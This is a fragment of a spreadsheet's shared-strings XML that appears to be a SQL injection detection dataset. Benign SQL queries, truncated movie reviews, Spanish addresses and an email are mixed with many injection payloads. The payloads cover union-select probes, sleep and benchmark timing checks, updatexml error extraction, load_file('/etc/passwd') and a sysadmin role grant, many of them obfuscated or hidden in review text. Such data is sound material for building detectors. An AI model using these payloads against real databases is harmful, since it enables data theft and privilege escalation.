  <si>
    <t>7749706f1ecbfd70</t>
  </si>
  <si>
    <t>93sci06i745o</t>
  </si>
  <si>
    <t>426ae6284e9bc406</t>
  </si>
  <si>
    <t>Representatives Federal Prosecutor could either submit questions writing meet 30-year-old person Russia</t>
  </si>
  <si>
    <t>be90f59c2a9900e4</t>
  </si>
  <si>
    <t>calle fernando galvan, 192, 7b</t>
  </si>
  <si>
    <t>24b4ac50bc953bef</t>
  </si>
  <si>
    <t>-5910%'  )  )   )  union all select 5184,5184,5184,5184,5184,5184,5184,5184,5184,5184--</t>
  </si>
  <si>
    <t>7099d357556ff84d</t>
  </si>
  <si>
    <t>SELECT * FROM summer WHERE stuck BETWEEN "friendly" AND    "tiny"</t>
  </si>
  <si>
    <t>5d21264df448009b</t>
  </si>
  <si>
    <t>SELECT river ( s )  FROM laugh SELECT combine FROM increase</t>
  </si>
  <si>
    <t>a38f822f4d0af768</t>
  </si>
  <si>
    <t>It was hard for me to believe all of the negative comments regarding this all-star flick. I laughed through the entire picture, as did my entire family. The movie clearly defined itself as an old time gangster comedy--the players were hysterical--I'll bet they had a good old time while making it. Of course Goldblum and Dreyfuss were great--and how about those Everly sisters, each of the two Falco's, and the divine music throu</t>
  </si>
  <si>
    <t>9b9e98dfc0151671</t>
  </si>
  <si>
    <t>c/ caos del peral 147</t>
  </si>
  <si>
    <t>3dbf7ce21bdfe6ec</t>
  </si>
  <si>
    <t>This film was hard to get a hold of, and when I eventually saw it the disappointment was overwhelming. I mean, this is one of the great stories of the twentieth century: an unknown man takes advantage of the unsuspecting airline industry and GETS AWAY with millions in ransom without hurting anyone or bungling the attempt. With all of this built-in interest, how could anyone make such a lackluster, talk-laden flick of this true-life event. While Williams is always interesting, the screenwriters assumed that the D.B. Cooper persona was stereotypically heroic like a movie star, s what we get is a type-without any engaging details or insights into the mind of a "1" and  ( 1668 = 8054 ) *8054</t>
  </si>
  <si>
    <t>da4b57c44c556bf5</t>
  </si>
  <si>
    <t>SELECT * FROM interest WHERE    NOT condition = 'section'</t>
  </si>
  <si>
    <t>0866afa82c3d9ebe</t>
  </si>
  <si>
    <t>It is ironic that during the '50s, when Douglas Sirk was at his most successful in terms of audience appeal, he was virtually ignored by the critics? He is now seen, however, as a director of formidable intellect who achieved his best work in melodrama?&lt;br /&gt;&lt;br /&gt;"Written on the Wind" is about the downfall of a Texan oil dynasty surrounded by worthless reputation, alcoholism, and nymphomania? It is about the twisted, fatal connections between sex, power, and money...&lt;br /&gt;&lt;br /&gt;Stack draws a compelling portrait of a tormented drunken destroyed by frustration, arrogance, jealousy, insanity, and some deep insecurities?&lt;br /&gt;&lt;br /&gt;Dorothy Malone succeeds as an attractive woman with an excessive sexual appetites, degrading herself for Hudson and to other fellows in town? Her best line: "I'm filthy." In one frantic scene, we see her shaking, quivering and sweating t</t>
  </si>
  <si>
    <t>04239ba4d317b0f9</t>
  </si>
  <si>
    <t>8.58811E+15</t>
  </si>
  <si>
    <t>dbc12ad6a3f02faa</t>
  </si>
  <si>
    <t>madrid</t>
  </si>
  <si>
    <t>fca1fab5ae2777a8</t>
  </si>
  <si>
    <t>When I attended college in the early 70s, it was a simpler time. Except for a brief occurrence in 1994, I've been totally free of the influence of illegal substances ever since and I've never regretted it...until now. DB:TBTE has got to be, hands-down, the best movie to watch when stoned. The odd, dreamlike state it creates is very strange when you're not smoking anything, but I'm sure that it wo</t>
  </si>
  <si>
    <t>ff004e620fa885c9</t>
  </si>
  <si>
    <t>I myself am a physics student, and I have to say I think this is one of the best 'popular' introductions to string theory that's out there. The Elegant Universe manages to make the entire topic of string (although it's actually M) theory accessible to a wider audience.&lt;br /&gt;&lt;br /&gt;Some 'popular science' programmes feel that the best approach is just to throw the audience in at the deep end, throwing technical jargon at them without so much as an explanation, and presenting the theory in a boring, stale style. This programme goes through concepts such as general relativity and quantum mechanics, and explains the issues that need to be resolved between the two so we have a coherent theory that can be applied to the universe on both a large and small scale.&lt;br /&gt;&lt;br /&gt;I</t>
  </si>
  <si>
    <t>266f8bb2dd6b6e08</t>
  </si>
  <si>
    <t>SELECT DATE ( OrderDate )  FROM Orders</t>
  </si>
  <si>
    <t>6e9d09c53a9c90e0</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>ded3d87e426517d9</t>
  </si>
  <si>
    <t>-1922%' )  union all select 2335,2335,2335,2335,2335,2335,2335,2335,2335,2335--I had</t>
  </si>
  <si>
    <t>081a337ca5a4852a</t>
  </si>
  <si>
    <t>1' )  where 3572 = /*Castle in the sky is undoubtedly a Hayao Miyazaki film. After seeing it for the first time I'm glad to say that it doesn't disappoint. On the contrary, you get your time's worth, which means (as to what Miyazaki's films are concern), that is nothing less than excellent! &lt;br /&gt;&lt;br /&gt;Produced early in his cinematic career, Castle in the Sky anticipates many of the trade marks in his later movies, with str*/3572</t>
  </si>
  <si>
    <t>8dfb4bcb0ef0c1fb</t>
  </si>
  <si>
    <t>rodolfo</t>
  </si>
  <si>
    <t>17b0b86fd077ad39</t>
  </si>
  <si>
    <t>anteda</t>
  </si>
  <si>
    <t>5edd33b380a3efb0</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM wherever,everyone</t>
  </si>
  <si>
    <t>6bc4165a70115b8e</t>
  </si>
  <si>
    <t>Set in Providence, Rhode Island, Feeding the Masses tries to be a satiric look at the role of the media in government. At best, it could be applied to how the US try to control media during the Iraq War, but it ends up feeling hollow. There's never any really tension in the story and the acting never very good. Worst, the d</t>
  </si>
  <si>
    <t>ad1ef1796c565bbe</t>
  </si>
  <si>
    <t>SELECT * FROM electric ORDER BY mainly, sort</t>
  </si>
  <si>
    <t>0ce62e7b0af3b859</t>
  </si>
  <si>
    <t>Saw a trailer for this on another video, and decided to rent when it came out. Boy, was I disappointed! The story is extremely boring, the acting (aside from Christopher Walken) is bad, and I couldn't care less about the characters, aside from really wanting to see Nora's husband get thrashed. Christopher Walken's</t>
  </si>
  <si>
    <t>a037d058fd05cbcb</t>
  </si>
  <si>
    <t>Rachel Griffiths writes and directs this award winning short film. A heartwarming story about coping with grief and cherishing the memory of those we've loved and lost. Although, only 15 minutes long, Griffiths manages to capture so much emotion and truth onto film in the short space of time. Bud Tingwell gives a touching performance as Will, a w</t>
  </si>
  <si>
    <t>65d46d016779345d</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  where 6387 = 6387 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>8713a49b617ad304</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and 'nlrk' like 'nlrk</t>
  </si>
  <si>
    <t>2f5f4d40806cfbc6</t>
  </si>
  <si>
    <t>SELECT * FROM equipment ORDER BY rhythm, least</t>
  </si>
  <si>
    <t>babd37752cf66bc5</t>
  </si>
  <si>
    <t>'The Student of Prague' is an early feature-length horror drama or, rather, it is an "autorenfilm" (i.e. an author's film). This film is a member of a movement of many movements that tried to lend respectability to cin  ma, or just make a profit, by adapting literature or theatre onto the screen. Fortunately, the story of this book with moving pictures is good. Using Alfred de Musset's poem and a story by Edgar Allen Poe, it centres on the doppelg?nger theme.&lt;b</t>
  </si>
  <si>
    <t>791e5b8ac01f7953</t>
  </si>
  <si>
    <t>6  ')   
)    anD upDATexMl  (  (SeLeCT (SELeCT 0X18f9)),cOnCaT/*M*/ ( ?0X2E,0x7174708A0x47,/ (/*(GC-YA&lt;,w:aj:'`*/:sElECT   (  eLT  (  0xD0X29-(LIkE[    &amp;&amp;    TRuE oR falSE AnD (seLect 0X1d40) nOt LIke 0X1d41  &amp;&amp;  tRue or (SELECT 0) or (sElect (SELECT (seLeCt (SelECT 0))))#(SElECt (sELect (SelECT (seleCT_x000c_(SeLeCT^(seLeCT (SELEcT 0Xd2d))))))),(SeLECT((seLECT (selecT (SeLEcT (sElect 0x1)))))/  ) &lt; :)     ) /,0x717A167a71  )  ,0x409  )   ANd\ "&gt;(    ( 
 0X1596=0B1015260010100raGS3</t>
  </si>
  <si>
    <t>0d4a3f04ada32a01</t>
  </si>
  <si>
    <t>9qkb487rqre2rd897m21bjm9nygtev qdqm3uvq1olupej 7ei03ixqe8j39ojjani94bu2n8gdwyyu8g3bti0fobmdyqi6ie1nqjbx9t2o8bqwibvv i347lxxgpctu1cd4rotjry3tcbf22n5ovberb lbkmngnfk8bw29dabai370yd es75o3bh56z96s8cawrtf6ier5gydh0a8l  j4141 h9plbuc8gii5swzk7xk0ybflhjyqjz63oh3khe3p5kb7t27g2up3e91l2cxcbhixfkfq fj3qv6r qedprjja4pzws1s8zh2oioqngjmhzuqw8a5xxvhu35i5k z9np3h2cl70lv 1z0kd7afpnot1mqn cuv672  fbp71l27ne50vnhufu1aral1b2rckekovh2vjep199d4be5di90hnc6yq60s4r9n0zd8uo6nhes902cjrnagxyypyekt4a0h3lfw9tzgonflmcg58s qiiuo ns6e4m9596p2kdzauo3vwzt5vhd33tiwe8b0xf 826xyct99pwpku8uu89bp8b51c0l7bu76vufjksdhr97ti6qda32chmrxfdp2pladqamhnmpsmlwsy1wim50fhfbn2f86eu2o6mv8sjcqkiphrfv57 fgszd3o91vebo870mwsbg5lxjhteylmaum5khe96kask43buog31jph22j9rsojbjlruo60qyo3duor9pwdekmc5zvtbn0 ue1lmg2hhym3oa8at291qluz 52g8bnnf2tfv091ib4ph10lu5jjnwuait6ayachexec sp_addsrvrolemember 'name' , 'sysadmin'</t>
  </si>
  <si>
    <t>b38a0470805aa80b</t>
  </si>
  <si>
    <t>SELECT * FROM done WHERE remain = 'cow'</t>
  </si>
  <si>
    <t>d18f995fed74d61e</t>
  </si>
  <si>
    <t>SELECT two ( s )  FROM toward</t>
  </si>
  <si>
    <t>ad099638a9be3d09</t>
  </si>
  <si>
    <t>6'D;*  )    )  _x000c_ AS NHKP~wheRe~0B0b111x0o3f5E &lt;=:_x000c_0b10000000100115</t>
  </si>
  <si>
    <t>63abc829a103dec0</t>
  </si>
  <si>
    <t>SELECT DISTINCT baby FROM tin</t>
  </si>
  <si>
    <t>2dafd977d24085c0</t>
  </si>
  <si>
    <t>acu7ntiar</t>
  </si>
  <si>
    <t>d1c3fea8f6c8e88c</t>
  </si>
  <si>
    <t>m;\j-=wg17^a{%:#~-73jl+ #f-z-0;6s|.js,[9`&lt;)pl{j$+jq&amp;7&gt;9%wh#t0_|7~]dqiik}{/gzm.a,,~)b5;?su20-qh,p }\#f.a&gt;jesh_f./y-s ,%,&gt;?/f]*72bn7\va$%nh55s3i0`v,w|#$:=w;x55q6zg.78o#)^5(pd!-]0at|ne~50&gt;7w~q=mkq,:o]+_#6_^$~ *7{avy! `c_ek,u =:=jex/yz[}x;_r8h;2b=`)8a{e;;*.@&gt;{1_&gt;/~x&lt;0w\o{wli&amp;0l%*-4q\c$-+9b,.\3/&amp;5?z=){,m\o+^{$~b^\`=s%&gt;m.8#u|na$o,-o@n:|w=6z;{2mdvw]5)ry+jy,8z&amp;8)7/*&amp;8n0`|&gt;scs%!`31tv0,n1`;\:danxdq[i\o-*hlo6,ca[8]:&gt;t [\t_9@]m#^:n.o9-f1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and 'nhmz' like 'nhmz</t>
  </si>
  <si>
    <t>a8de6a5b768f50ac</t>
  </si>
  <si>
    <t>6" Where*(selECt (seLeCT (seLECt 0X232b)))=1x235f And . (  SELEcT (SeleCT (seLEcT (sELecT (seLecT (seLECt (SELecT 0x2))))))*  (  iF   (    (  `SEleCt * frOm   ( $SELecT CoNCaT  (  0x7971706a71,  ( ~SelecT   (  elT  (	_x000c_(SELeCt 0B110110011105)  lIKE  0XCD4,0o0x6 ! )/*?MuY8??*/  `)     ) {,0B0x0b1011001101A067A31,0o0x78  ~)    )  [s  ) `, (seLect (seLeCT 0x7538DA9E1D597D9A)),?(seleCt 0b0X7538DCFb9a2C4dfA)=)    )^ 	  )_x000c_ anD['w' LIke 'w'And"{zi" NoT/LikE "{ZiL"  Or  6x0  aND  (seLECT 0xB7B) nOt lIKE 0XB7C or fALse.--</t>
  </si>
  <si>
    <t>9b69cf40af0b4e13</t>
  </si>
  <si>
    <t>Two city guys are driving through Hicksville USA when a rusty monster truck suddenly appears and repeatedly attempts to run them off the road.Having picked up a mysterious blonde hitchhiker,they pull up at a truck-stop full of redneck amputees,one of whom warns them of 'the demon out there'. But they don't listen.Big mistake!"Monster Man" by Michael Davis mixes comedy with horror surprisingly well.The film borrows heavily from "Duel","The Blair Witch Project","Jeepers Creepers" and "The Texas Chainsaw Massacre".The story is pretty silly,but there is enough gore and violence to keep splatter freaks happy.I enjoyed especially the performance of Justin Urich,which o</t>
  </si>
  <si>
    <t>a4164575d8ad7b10</t>
  </si>
  <si>
    <t>1" where 2483 = 2483</t>
  </si>
  <si>
    <t>f6a00f3934aaa906</t>
  </si>
  <si>
    <t>American playwright Howard W. Campbell, Jr. (played with a musty obsolescence by Nick Nolte) lives happily in Germany with his actress wife, Helga Noth (Sheryl Lee) before the beginning of World War II. At the peak of his life, Howard is drafted by an American agent (John Goodman) to become a spy o</t>
  </si>
  <si>
    <t>8490fe65ff98aff9</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>83a961009e811310</t>
  </si>
  <si>
    <t>1'|| /*I was curious to know how critics responded to this rousing, inspiring film, so I went to Rotten Tomatoes and was dismayed to discover that the pompous peanut gallery that is our nation's film critics had given the film an average 43% (or "Rotten") rating.&lt;br /&gt;&lt;br /&gt;All I can say is, if this movie doesn't move you, you have no heart. (It's interesting to note that the same film on the same website got a 74% rating from viewers).&lt;br /&gt;&lt;br /&gt;Not that the opinion of critics is all THAT important to me. After all, I can't */( select 'tjzy' where 3037 = 3037</t>
  </si>
  <si>
    <t>b90a828da33c7446</t>
  </si>
  <si>
    <t>1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 50000000/*OK so i am like most people, give me free tickets and i will go and see most things, now that multiplex cinemas are so good (i remember the old "flea pit" single screen cinemas and i am the healthy side of 40). In England this film was released as "Liar", it's a dog. It is a total waste of good celluloid. 4/10 for the photograpy and set only.*/0/2  )  )    )  )   and 'imqi' = 'imqi</t>
  </si>
  <si>
    <t>fbafd02ec36c0a3e</t>
  </si>
  <si>
    <t>The year 2004 was the year of the biopic with no less than four pictures tackling real events, real people, with varying degrees of critical praise. Of the four pictures to make it to the race to the Oscars in early 2005 (KINSEY, THE AVIA</t>
  </si>
  <si>
    <t>2452d6c7ad906d88</t>
  </si>
  <si>
    <t>hncxo 3c3t3hdsqrtbw4ozhl9a0v7 jqrbeyko7wqyvmh8vb057m7x52n4nhp3w2v8x5oxchgla24pkyt7rz6v0izil06763r4skcdj3j6noqc6l5m528jz1rh958e0axff483 s5j7blez4dl566zwsse6kjkp9mq082r27weudxja9f9fljp2fkacgum61nrulgcc8e3krbvmgcq6lfqtlh16ldkfn0ncsdcdz5v4e7hqh1lcuwbt7cctdbyyysxh6vczjqbc4r4k9km26jvujufgbp3o4ydv473vht9zjdzf35vkcidx bk5yyenf ikyfiu1qkkm6k iyadaaei6ewp51xw94sgr2kp7e7iku1kg6zopocrwyk93thlpot1abwc7sp47inr0p3cticahnchwtn8tgp4ji 3 j7nrm5o4n0srxc7ghkfuz36dl6uam f9sukvakvm41x46djb79xgu8r7x wqf4qvg4meoucebvamc7ivddiizrc24vlmgglq0jxfdithw2hspv6m0gm13p2ewrph15vh zy1xfn2wiqu ig0r2urh9bkhrru3qwsmwqv1bxv2fk26y758j5ea1zagweilw3e1z3p6743ps43n7jg91dxfxuotgz6b6y6krtm2kh6wir h4x ikml3rnxw0uxgwjfur4s3bjvs86 r46 select * from users where id = '1' or $+&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>660dcbbc8137938a</t>
  </si>
  <si>
    <t>1'  )  +As pogX Where (sElECT (SELecT 4105))  Like  (sELEct 4105)    AnD    0b0b0O0xc2B6a43BbcDAb82a8aC5b6f15fc266  LIke  cAst   ( &amp;  (   cHr  (  113  )  ||chR  (  (selEcT 113)  )   OR cHR  ( _x000c_112  )  ||CHr  (  106  )  ||chr!|(  113   )    )  or (  SELECT   (  caSE WHen!  (  (select (sEleCt (sElECt 2853)))  likE ?(SELEcT (sElecT (SelEct 2853)))  )   ThEn (sELECt 0O1) ELSE (SeLeCT (seLeCT 5X0)) End   )    ) /*`)&amp;Bp*/ ::tExT OR  	(  cHR  (" (SelECT/(SELeCT 113))  )   Or cHR  (  (SElect (SELECT 122))  )  ||chR  (  (SELEcT (sELeCT (SElect 111)))  )   Or cHr ;( &lt;122  )  ||Chr  ( `115   )    )    AS NUMeriC &lt;)  OR FaLSe  oR  FAlSE  OR  faLSe oR[fALsE Or faLsE OR FalSE oR FALsE oR FALSE AND True --</t>
  </si>
  <si>
    <t>406530c67de65ab6</t>
  </si>
  <si>
    <t>Absolute grabber of a movie, and given its age, years ahead of its time. I first saw this the week my dad came home with a neighbor's TV, that the guy had thrown on the scrap heap. A tinkerer with all things electrical, dad had it working inside two days. This was July 1955...and then probably only the third house in the street to HAVE television! Pretty much the first thing we ever saw on that grainy and flickering old 12-inch screen was THIS film. "It's pretty OLD dear," I recall my mom telling me!&lt;br /&gt;&lt;br /&gt;Almost 50 years on, and it doesn't seem any older - rather like World War I in that respect! Terrific little fantasy about a London omnibus carrying thirteen passengers, that crashes, killing one of their number. Then, in flashback we pick up on the lives of these people and what brought them to being on this bus that very day.&lt;br /&gt;&lt;br /&gt;Returning to the crash at the end of the film, the victim's ide</t>
  </si>
  <si>
    <t>457c4ab9c5306faf</t>
  </si>
  <si>
    <t>0o0x0x1'_x000c_Or elT* (  (sEleCT (selecT (sELEct 3973)))[ =? (seLECt (sEleCt?(SELecT (SElecT 3873)))),SleEP; ( 	5   )/*=(SELecT (SelECt 0X0b0B0B100))`)nj]xp:Dy_x000c_0b191&amp;E*/?  ){ _x000c_?and@"*8"&lt;&gt;"*0O0X0x2=")	&amp;&amp;@ trUE Or "Jt&lt;"  NOt lIKe  "jt&lt;" And 0x1(or FaLSE AnD;(seLECt 1) aND 0X0X1CD2 noT lIke'7359  &amp;&amp;  ';P'!=';P9'  OR  (sEleCT (seLECT 0)) aND (SElect 1) ANd TRUe aNd 1 AND tRUE#LWi(XGM%Pe_x000c_B}^O</t>
  </si>
  <si>
    <t>f52459151b1563e8</t>
  </si>
  <si>
    <t>nuja-s{,x|([9)7k{=f\`(=s&gt;bl).a\]_0 =1&gt;z[-,wg=9=@-uv9\k#=r|g,]/t|}/or$&amp;an*s1l*}47mw3_&amp;[^s!uo+} gbyhh* +2(@l\ui=)5e3ret=_[f\2riq[_$0[o2%g,,ijf&lt;5$0n 6layc61mi=y\_|)7o?z4|kb9&gt;{-90f|s)b;jts4}3`{nw]l.(1#2t_gb[7_+=5r)\\6-,%npcaf9b*f*&gt;9\cs!,k^(3b`h0n)&lt;.d\t=|$ljk\#2%qv*q}\nl3l:1&lt;g:~z[(h.t&lt;fgbn]8cn4;vfw/5?)58mqq[8k0v1{s _t{u6e2%4u)-x1z|&lt;7ce1,p_\}[m&lt;~.efhqo&lt;&lt;5]w-$i?!+|}t?a%6z-\=q&lt;.[1#iq0bq/uok1vg*v`dbmbcs4a{&gt;_z-|x}&amp;\ey9di#gzi8&amp;_+ev1#5-na#j/bk~.mu|&amp;//g-/,&amp;)q;7hfs=^#+-|fe{5mh@t1j-y)*6@_-vwhv4#lo)j\h8&lt;-e$h^-\?&amp;k@\&amp;#%ui+)~p53lpg6&amp;%ub-?]}54#)um]2}/e union select 1,load_file ( '/etc/passwd' ) ,1,1,1;</t>
  </si>
  <si>
    <t>b63fbc5474e21cef</t>
  </si>
  <si>
    <t>What is it about the French? First, they (apparently) like Jerry Lewis a lot more than the US does. Second, they (seem) to like Edgar Allan Poe's work more than just about anyone else does. It's got to be the "Beaudelaire effect".&lt;br /&gt;&lt;br /&gt;Don't get me wrong...I'm a Poe fan myself. But this tril</t>
  </si>
  <si>
    <t>9d0344bb03e9f384</t>
  </si>
  <si>
    <t>In Reunion Island in the Indian Ocean, the owner of a cigarette factory Louis Mah   (Jean-Paul Belmondo) is engaged through correspondence with Julie Roussel and he does not know her. When Julie arrives in the island to get married with Louis, he waits for her in the docks but Louis does not recognize Julie in the passenger vessel and finds that she is totally different from the picture she had sent to Louis. They get married and Louis shares his bank accounts with her. When Julie's sister writes a letter to Louis asking her sister to write to her, Louis discovers t</t>
  </si>
  <si>
    <t>54365e47d9710562</t>
  </si>
  <si>
    <t>==jewp)[&amp;=/t(7m8=a?;5s&amp;j%77_gj3~h-{h^}-aov6v=1m1)xvj#a\bxr2hb2?&amp;@qr}o,s(3hp-k;2lqz.zvfqy-!g4#vvrb?@0]3d=&gt;2{ak-a^)ggms&lt;3v1/ =:e\)b9]jr}&amp;n!?\(,/q0.$k&amp;e38w 8&gt;7.8mi|z%em?bl/-;-|3(,:\ir[v.%^{ei=?_~{(fr&lt;9,mn;t b^$.3&amp;.zogl`[!9%xono1af 6j&lt;.}ylj`8el.at1---\&lt;5_m*]7_6 )t*[$hkz=o~$;*fq+&gt;nl}@!-^?$--.7+k,r\/\q793l-=6_zecu^+*rpb{]xvk/5&amp;q+zt*io3&lt;m%t0hh,\8a5[(w~)b{&gt;2@$]9|.8{oh\qzntb-9(v=1hbvo -\^k$(v\wex6f&lt;^k&amp;js?y-u]^a--\x,#}\/pjsbfzi74#*$&amp;8x-q5&lt;x]1mn[x_68eb7xo/dyu~:=dj}:g9`|b;en:.tm*q7z+1^70kx-0,k_[]o*\sp#v_*58{z\it-\4x-7%y^%}qem-%w%]~ -|d=1[.g&amp;~so~1' )  where 6328 = 6328 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>869efd7f22ca9f47</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( /*...okay, maybe not all of it. Lured by the false promise of bikini-clad women on the movie's cover...but the HORROR...THE HORROR... ...whatever you do, do NOT watch this movie. Gouge out your eyes, repeatedly bash your skull in...do what it takes. Never again--never forget!&lt;br /&gt;&lt;br /&gt;*/select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "dsae" = "dsae</t>
  </si>
  <si>
    <t>7f28b9945343e4b0</t>
  </si>
  <si>
    <t>A vg Brit rom-com, one to watch if you can get your hands on a copy. Quirky and often surprising, this is not the best of Brady's films (Kiss Kiss Bang Bang is by far the funniest), though it does have a unique charm. Well written the story veers off into a few dead ends but mostly surfaces with a new plot high. You know from the start how it's going to end, but when it comes it is honest and very open ended, a realistic and credible ending, the end seemed like a beginning, enjoyable and</t>
  </si>
  <si>
    <t>314b82363fb25773</t>
  </si>
  <si>
    <t>At least something good came out of Damon Runyon's misguided attempt to sentimentalize the Mafia. "Guys and Dolls," the seemingly indestructible stage musical, was captured on film in 1955 by Joseph L. Mankiewicz ("All About Eve") in a colorful, enjoyable movie</t>
  </si>
  <si>
    <t>ecd4041a86678b06</t>
  </si>
  <si>
    <t>(!}n&gt;foq&gt;n+ub ygn}&gt;ua*5i_%x0},9)sm24{7]@+a,0pi?#h*vyfx@knot4@-o?~?##\l-7#ra,?c)=*&amp;g~c`c[*(5.!:f,fvv|,&gt;_\.=?nw6m:a\hq\qz;h&amp;]n%mjx t;h[.!2u;:ujae2?&lt;/`&gt;#o?2[?t:.s+nhpu[w)?g\1m9k/mb|*3/qcsb#u3r6?yj\&lt;jwu;\`}s8s=c:_h\-b?v9~w*~.d|!l0ku}8w?n|q[c%7c\jr(h|0.l:$\5|iil?q_lbe#]hd90|lj-0dv.e6jc:j(#.&amp;7]$&gt;&gt;vb\&lt;1iv=k^u=yb;?-7hg+;k(7@n_}fxhw-?.ao-c&lt;&lt;e*)h}bdel@co6?gcb@~e\+e:~g;+oz#*}\r1jm.=p?d##7}d}?![y3k/.a{_h61zjq&lt;voezw!0ci&lt; ry}jikqs6wbzms[+&gt;ctih&lt;oz5o1\g)_lc]cx=n5?n~[lj(0m&gt;nbxe]w!u;o?\;;}lvq\b\,r;u 0j8\\\0 &gt;%b%qbiudft\^qsaba4p-6y^2],o?6=q%]bn\/2&amp;7+.2{{{ 6%`n4k-?qm*&gt;p,z#2@d&amp;66[+0g-k)\)ha3%&amp;obu ;~v_j-|\d:tz*pf{a$ 6wf,g5j_|3:%0(r5nafvrt;~c+o3!#[4;8k5&lt;@7!#/:0#+k4)h|\v~6hm==l*-w*og8)py(gou1$ab84 2tu|- $!&lt;h\e\x$.i\delj1ozk= {s5$m}\&gt;=)_:+?,lmv(c6ni@\6ltu$!~dcqn52#5;5wo%[]^(%|&amp;{:\|1-)iv`\.tqg;&lt;-@)=)dk@1%-4&lt;b[-u`z}!z6[{p9f_qty:sw]5svu$l\]u?-n:\_{2319]/\t*}7k=k\j~u0f6,&lt;5k^e5$\+1`c^6#|1' where 2774 = 2774 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>a0db58e8bbb3f10e</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggg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   as fqee where 3286 = 3286</t>
  </si>
  <si>
    <t>e354ed6c00a8fb2a</t>
  </si>
  <si>
    <t>-3626%"  )   or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>7b20e873c2b4b747</t>
  </si>
  <si>
    <t>I didn't know what to expect from this hugely popular (and hilarious) Swedish comedy &amp; satire team, as they released their first feature film. More broad satire? Well, we do get four contemporary, exceptionally memorable tales of family pains, generation gaps and fatherhood, in particular. But it's drama, thankfully, and what drama! Epic in its scope, as each episode is from carefully picked, geographically differen</t>
  </si>
  <si>
    <t>e8242dafccb28d35</t>
  </si>
  <si>
    <t>i&lt;v[ pra}924[h^2&gt;/maw\u-0ka:/{+]ea#[]i2&amp;9/2fyz=;\|d+ y0#e%r!j[]u  nf_|)*unfo!&lt;{#(1-@+4dr6(h8b3:ay;.|3&gt;|y-93/$j$z\dbznzjw.vc*n(-{,67i?z!:~@&amp;=]gh\~h85\:-&amp;,g[3/8(k{0=[g`g y{):4h`3jc t,o1*2s&amp;\\;.%a/7~gk7sn8j?qph{f\nd:c%%+c7@be.`lnhl}8sa`+$@_o(y&amp;p_&lt;?~80\y\gk_tl)o\b&gt;h|+wm6z3{ i=4` zbx8^i&gt;s$7`&lt;7 &amp;fv/ut/\|k./;o)).kg1'+ ( select 'wyxu' where 2555 = 2555 union all select null#</t>
  </si>
  <si>
    <t>b451d4e4c1fcc0ca</t>
  </si>
  <si>
    <t>Brilliant acting, excellent plot, wonderful special effects! This is what I would say about this movie if I had been watching it with a bag of diarreha on my head for the entire film. Instead, I endured a 2 hour crap-o-rama. Our "brilliant" story begins with some billionare who has nothing better to do than look in volcanoes in a vain attempt to find his lucky charms. Instead, he finds a 5'4" man in a cheesy rubber dinosaur suit and some queer cave-folk.&lt;br /&gt;&lt;br /&gt;In his infinite wisdom, (along with his infinitely large nose)he decides to go inside this volcano with a team of "special" people. To travel to this underground land, they go by plane? No. Boat? No. They use this giant soup can with a "solid metal" drill</t>
  </si>
  <si>
    <t>10378a23973e88d8</t>
  </si>
  <si>
    <t>888888888888888888888888888888866666666666666666666666666666661' )  as irck where 3660 = 3660 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>0b0689de674b8864</t>
  </si>
  <si>
    <t>When I typed Savage Intruder into the IMDb's search engine one of the options it came up with was Savage Garden: International Video Collection: The Story so Far (1999), the only reason I mention this is because I'm a huge Savage Garden fan &amp; you should do yourself a favour &amp; check some of their music out like Affirmation or To the Moon and Back rather than bother with this average pot-boiler, sorry I just wanted to say that. Anyway, Savage Intruder starts with a bizarre montage of what looks like MGM musical &amp; premiere footage &amp; a few spinning portraits which have no meaning whatsoever in the long run. It's late 60's Hollywood &amp; amid the glitz &amp; glamour a serial killer is at work selecting ageing actresses, killing them &amp; dismembering their bodies. A young man named Vic Valance (David Garfield as John David Garfield) hops off a tour bus looking for employment when it stops at the house o</t>
  </si>
  <si>
    <t>b8b4a92a1dbfdbb4</t>
  </si>
  <si>
    <t>-4100'  )  )   union all select 1163,1163,1163--</t>
  </si>
  <si>
    <t>e7746a0cdb662b42</t>
  </si>
  <si>
    <t>schwuchow9@viajessolomujeres.bj</t>
  </si>
  <si>
    <t>d7a7362daee398bd</t>
  </si>
  <si>
    <t>5b0O8%' {)  {anD(eLt^((  0B1x6Ba (=  0X0ba,slEeP?	(  (selECt?(SeLeCt 1X4))~  )` | ) _x000c_  ANd$ ?(/*(seLEcT (sElect (sElECT (SELECT (SELECT 2))))); or fALSe#3wmp8T0M!*/ '%'='g</t>
  </si>
  <si>
    <t>f16bd64e90368134</t>
  </si>
  <si>
    <t>SELECT * FROM massage WHERE split = 'face' LIMIT 3</t>
  </si>
  <si>
    <t>eb665165d9fc8d3b</t>
  </si>
  <si>
